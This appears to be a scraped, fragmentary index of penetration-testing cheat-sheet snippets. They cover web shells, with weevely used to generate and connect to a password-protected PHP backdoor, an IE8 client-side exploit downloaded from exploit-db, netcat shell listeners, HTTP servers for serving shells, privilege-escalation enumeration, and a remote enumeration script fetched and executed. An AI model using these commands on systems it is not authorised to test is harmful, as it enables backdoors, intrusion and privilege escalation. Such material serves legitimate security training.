AES Decryption
http://aesencryption.net/
Convert multiple webpages into a word list
for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; \
done
Or convert html to word ...
Score: 0
Web Shag Web Application Vulnerability Assessment Platform
webshag-gui
Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/
Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t
...
Score: 0
Client Attacks
MS12-037 - Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start
JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.
Linux Client Shells
http://www....
Score: 0
Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:
whoami
net user "%username%"
Try the getsystem command using meterpreter - rarely works but is worth a try.
...
Score: 0
De facto Linux Privilege Escalation Guide - A much more thorough guide for Linux enumeration: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Try the obvious - Maybe the user is root or can sudo to root:
id
sudo su
Here are the commands I have learned to use to perform Linux enumeration and privilege escal...
Score: 0
Post exploitation refers to the actions performed by an attacker once some level of control has been gained on the target.
Simple Local Web Servers
Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80
Run a basic Python3 http server, great for serving up shells etc
...
Score: 0
Netcat Shell Listener
nc -nlvp 4444
Spawning a TTY Shell - Break out of jail or a limited shell. You should almost always upgrade your shell after taking control of an apache or www user.
(For example, when you encounter an error message such as "sh: no job control in this shell" when trying to run an exploit.)
(hint: sudo -l to s...
Score: 0
DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
Nmap Fuzzers:
Nmap Fuzzer List
https://nmap.org/nsedoc/categories/fuzzer.html
Nmap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/regis...
Score: 0
File Enumeration
Find UID 0 files root execution
/usr/bin/find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
Get handy linux file system enumeration script (/var/tmp)
wget https://highon.coffee/downloads/linux-local-enum.sh
chmod +x ./linux-local-enum.sh
./linux-lo...
Score: 0
Nmap Exploit Scripts
https://nmap.org/nsedoc/categories/exploit.html
Nmap search through vulnerability scripts
cd /usr/share/nmap/scripts/
ls -l *vuln*
Nmap search through Nmap Scripts for a specific keyword
ls /usr/share/nmap/scripts/* | grep ftp
Scan for vulnerable exploits with nmap
nmap --script e...
Score: 0